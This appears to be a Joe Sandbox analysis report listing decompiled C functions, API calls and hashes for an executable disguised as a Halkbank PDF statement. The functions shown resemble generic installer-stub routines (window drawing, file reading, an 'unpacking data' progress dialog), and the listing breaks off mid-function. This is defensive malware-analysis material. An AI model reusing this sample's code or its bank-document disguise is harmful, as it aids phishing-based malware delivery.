                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                      • String ID: ('B
                                                      • API String ID: 1495540970-2332581011
                                                      • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                      • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                      • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                      • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                      0x0040463d
                                                      0x004046f3
                                                      0x00000000
                                                      0x004046f3
                                                      0x0040464e
                                                      0x00404652
                                                      0x00000000
                                                      0x0040466c
                                                      0x0040466c
                                                      0x00404675
                                                      0x00000000
                                                      0x00000000
                                                      0x00404677
                                                      0x00404683
                                                      0x00404686
                                                      0x00404686
                                                      0x0040468c
                                                      0x00404692
                                                      0x00404692
                                                      0x0040469e
                                                      0x004046a4
                                                      0x004046ab
                                                      0x004046ae
                                                      0x004046b1
                                                      0x004046b3
                                                      0x004046b3
                                                      0x004046bb
                                                      0x004046c1
                                                      0x004046c1
                                                      0x004046cb
                                                      0x004046d0
                                                      0x004046d3
                                                      0x004046d8
                                                      0x004046db
                                                      0x004046db
                                                      0x004046eb
                                                      0x004046eb
                                                      0x00000000
                                                      0x004046ee

                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                      • GetSysColor.USER32(00000000), ref: 00404686
                                                      • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                      • SetBkMode.GDI32(?,?), ref: 0040469E
                                                      • GetSysColor.USER32(?), ref: 004046B1
                                                      • SetBkColor.GDI32(?,?), ref: 004046C1
                                                      • DeleteObject.GDI32(?), ref: 004046DB
                                                      • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                      • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                      • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                      0x004026ec
                                                      0x004026ee
                                                      0x004026f1
                                                      0x004026f3
                                                      0x004026f6
                                                      0x004026fb
                                                      0x004026ff
                                                      0x00402702
                                                      0x00402705
                                                      0x00402c2a
                                                      0x00402c2d
                                                      0x0040270b
                                                      0x0040270b
                                                      0x00402712
                                                      0x00402714
                                                      0x00402714
                                                      0x0040271a
                                                      0x0040287e
                                                      0x0040287e
                                                      0x00402881
                                                      0x00402886
                                                      0x004015b6
                                                      0x0040292e
                                                      0x0040292e
                                                      0x00000000
                                                      0x00402720
                                                      0x00402721
                                                      0x0040272c
                                                      0x0040272f
                                                      0x0040273b
                                                      0x0040273f
                                                      0x004027d7
                                                      0x004027ef
                                                      0x004027ff
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402745
                                                      0x00402745
                                                      0x00402748
                                                      0x00402749
                                                      0x0040274c
                                                      0x00402751
                                                      0x00402758
                                                      0x00402760
                                                      0x00000000
                                                      0x00402766
                                                      0x00402766
                                                      0x0040276b
                                                      0x00000000
                                                      0x00402771
                                                      0x00402771
                                                      0x00402779
                                                      0x0040277c
                                                      0x0040277f
                                                      0x0040283a
                                                      0x00402841
                                                      0x00402785
                                                      0x0040278b
                                                      0x00402797
                                                      0x00402801
                                                      0x00402801
                                                      0x00402799
                                                      0x00402799
                                                      0x0040279c
                                                      0x0040279e
                                                      0x0040279e
                                                      0x0040279e
                                                      0x004027a1
                                                      0x004027a6
                                                      0x004027a9
                                                      0x00000000
                                                      0x00000000
                                                      0x004027ab
                                                      0x004027ae
                                                      0x004027bc
                                                      0x004027c2
                                                      0x004027d0
                                                      0x00000000
                                                      0x004027d2
                                                      0x00000000
                                                      0x004027d2
                                                      0x00000000
                                                      0x004027d0
                                                      0x0040279e
                                                      0x00402804
                                                      0x00402807
                                                      0x00000000
                                                      0x00402809
                                                      0x0040280e
                                                      0x0040284f
                                                      0x00402871
                                                      0x00402878
                                                      0x0040285d
                                                      0x0040285d
                                                      0x00402860
                                                      0x00402863
                                                      0x00402866
                                                      0x00402866
                                                      0x00000000
                                                      0x00402817
                                                      0x00402817
                                                      0x0040281a
                                                      0x0040281d
                                                      0x00402823
                                                      0x00402827
                                                      0x0040282a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040282a
                                                      0x0040280e
                                                      0x00402807
                                                      0x0040277f
                                                      0x0040276b
                                                      0x00402760
                                                      0x00000000
                                                      0x0040282c
                                                      0x0040282c
                                                      0x0040282f
                                                      0x00402838
                                                      0x00000000
                                                      0x0040272f
                                                      0x0040271a
                                                      0x00402c33
                                                      0x00402c39

                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                        • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                      • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                      • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                      • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                      0x004068f1
                                                      0x004068fa
                                                      0x00406911
                                                      0x00406911
                                                      0x00406918
                                                      0x00406924
                                                      0x00406924
                                                      0x00406927
                                                      0x0040692a
                                                      0x0040692f
                                                      0x00406931
                                                      0x0040693a
                                                      0x0040693e
                                                      0x0040695b
                                                      0x00406963
                                                      0x00406963
                                                      0x00406968
                                                      0x0040696a
                                                      0x0040696d
                                                      0x00406972
                                                      0x00406973
                                                      0x00406977
                                                      0x00406977
                                                      0x00406978
                                                      0x0040697f
                                                      0x00406981
                                                      0x00406988
                                                      0x00000000
                                                      0x00000000
                                                      0x00406990
                                                      0x00406996
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406996
                                                      0x0040699b

                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                      • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                      • CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                      • CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-4010320282
                                                      • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                      • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                      • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                      • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                      0x0040303d
                                                      0x0040303f
                                                      0x00403046
                                                      0x00403049
                                                      0x00403049
                                                      0x0040304f
                                                      0x00000000
                                                      0x0040304f
                                                      0x0040305d
                                                      0x00000000
                                                      0x00403060
                                                      0x00403067
                                                      0x00403073
                                                      0x0040307b
                                                      0x004030b9
                                                      0x004030c2
                                                      0x00000000
                                                      0x004030c7
                                                      0x00403084
                                                      0x00403095
                                                      0x00000000
                                                      0x004030a3
                                                      0x00403084
                                                      0x004030cf

                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                      • GetTickCount.KERNEL32 ref: 00403067
                                                      • wsprintfW.USER32 ref: 00403095
                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                      • CreateDialogParamW.USER32 ref: 004030B9
                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                        • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                      • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                      • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                      • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                      0x00404f8d
                                                      0x00404f9a
                                                      0x00404fa0
                                                      0x00404fde
                                                      0x00404fde
                                                      0x00404fed
                                                      0x00404ff4
                                                      0x00000000
                                                      0x00404ff6
                                                      0x00404fa2
                                                      0x00404fb1
                                                      0x00404fb9
                                                      0x00404fbc
                                                      0x00404fce
                                                      0x00404fd4
                                                      0x00404fdb
                                                      0x00000000
                                                      0x00404fdb
                                                      0x00000000

                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                      • GetMessagePos.USER32 ref: 00404FA2
                                                      • ScreenToClient.USER32 ref: 00404FBC
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                      • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                      • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
